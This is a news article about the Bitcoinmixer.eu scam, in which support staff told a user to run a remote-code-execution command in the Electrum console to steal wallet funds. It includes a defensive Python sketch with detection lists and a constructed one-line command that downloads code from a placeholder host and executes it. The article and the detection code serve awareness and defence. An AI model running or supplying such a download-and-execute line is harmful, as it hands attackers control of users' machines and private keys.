A bitcoin mixing service, a service used to mix various transactions to improve privacy on the Bitcoin blockchain, has reportedly been found to be scamming users by first stealing their BTC and then trying to get access to their device.
On Reddit, a user detailed that he tried to use a bitcoin mixing service called Bitcoinmixer.eu to make his funds untraceable, but saw that “something in the mixing process failed.” After contacting the service’s support, he was told to run a command in his Bitcoin wallet’s console to request his funds back.
After running the command multiple times, the user got the same reply: “server exception, please, contact with support.” After asking for help on social media, others warned him he was being scammed by the bitcoin mixing service.
The CTO of LocalCoinSwap, Nathan Worsley, replied to the user’s thread warning him not to run the command he was given. Per his words, it’s a “remote code execution” and there’s “no legitimate reason” to ask a user to run it. In a follow-up on GitHub, he detailed that the code is designed to work with multiple operating systems.
You are being asked to run this command in a Python shell (Electrum console). That command makes an API call to download code, and then it immediately runs that code on your computer with no protections. That code could install a keylogger, or hand over the private keys to any coins you later handle with your computer.
He added that in this specific instance wallet-stealing code was being downloaded, and advised the user to at the very least “completely delete all traces of Electrum from your system and reinstall it” as the malware compromised the installation.
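The pattern Worsley describes, a console command that downloads code and immediately runs it, can be recognised by reading the command rather than running it. The following Python sketch is an added example, not code from the article, from Worsley or from Electrum; the function name, the indicator lists and both sample commands are assumptions constructed for illustration, since the article does not reproduce the real command.

```python
import ast

# Illustrative lists (assumptions for this example, not an exhaustive blocklist).
RUNS_CODE = {"exec", "eval", "compile", "system", "popen", "Popen"}
FETCHES = {"urlopen", "urlretrieve", "create_connection"}
NET_MODULES = {"urllib", "urllib2", "requests", "http", "socket"}

def is_net_module(name):
    return (name or "").split(".")[0] in NET_MODULES

def audit_console_command(source):
    """Statically inspect a pasted console command; the text is never executed."""
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return {"verdict": "unparseable", "runs_code": [], "fetches": []}
    runs_code, fetches = set(), set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            # Last component of the call target: exec(...) or x.y.urlopen(...)
            name = getattr(node.func, "id", None) or getattr(node.func, "attr", "")
            if name in RUNS_CODE:
                runs_code.add(name)
            if name in FETCHES:
                fetches.add(name)
            # __import__("urllib.request") hides an import inside an expression
            arg = node.args[0] if node.args else None
            if name == "__import__" and isinstance(arg, ast.Constant) and is_net_module(str(arg.value)):
                fetches.add("__import__:" + str(arg.value))
        elif isinstance(node, ast.Import):
            fetches.update("import:" + a.name for a in node.names if is_net_module(a.name))
        elif isinstance(node, ast.ImportFrom) and is_net_module(node.module):
            fetches.add("import:" + node.module)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.startswith(("http://", "https://")):
                fetches.add("url-literal")
    if runs_code and fetches:
        verdict = "download-and-execute"  # the pattern described in the warning
    else:
        verdict = "review" if (runs_code or fetches) else "no-indicators"
    return {"verdict": verdict, "runs_code": sorted(runs_code), "fetches": sorted(fetches)}

# Constructed samples; the article does not reproduce the real command.
SUSPICIOUS = 'exec(__import__("urllib.request").request.urlopen("https://example.invalid/fix").read())'
BENIGN = "getbalance()"

if __name__ == "__main__":
    for sample in (SUSPICIOUS, BENIGN):
        print(audit_console_command(sample))
```

A "no-indicators" result is not proof that a command is safe, because obfuscated code can hide these names from a static check; a wallet console command received from a third party should not be run either way.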
On GitHub, he concluded Bitcoinmixer.eu was attempting to steal its users’ BTC:
First, they blatantly steal funds during the mixing service, and then after the user contacts support they are victimized with a further attempt to completely clean out their wallet.
Since the warning was issued, Bitcoinmixer.eu went offline and is, at press time, still down. It’s worth noting bitcoin mixing services aren’t well regarded by law enforcement, as in May last year authorities took down one of the three largest cryptocurrency mixing services in the world, Bestmixer.io.
Phishing attacks are also fairly common in the cryptocurrency space. In December 2018 hackers pulled a phishing attack on the popular Electrum wallet, tricking users into getting a malicious version of its software to steal their funds. The attack netted the hackers over 200 BTC.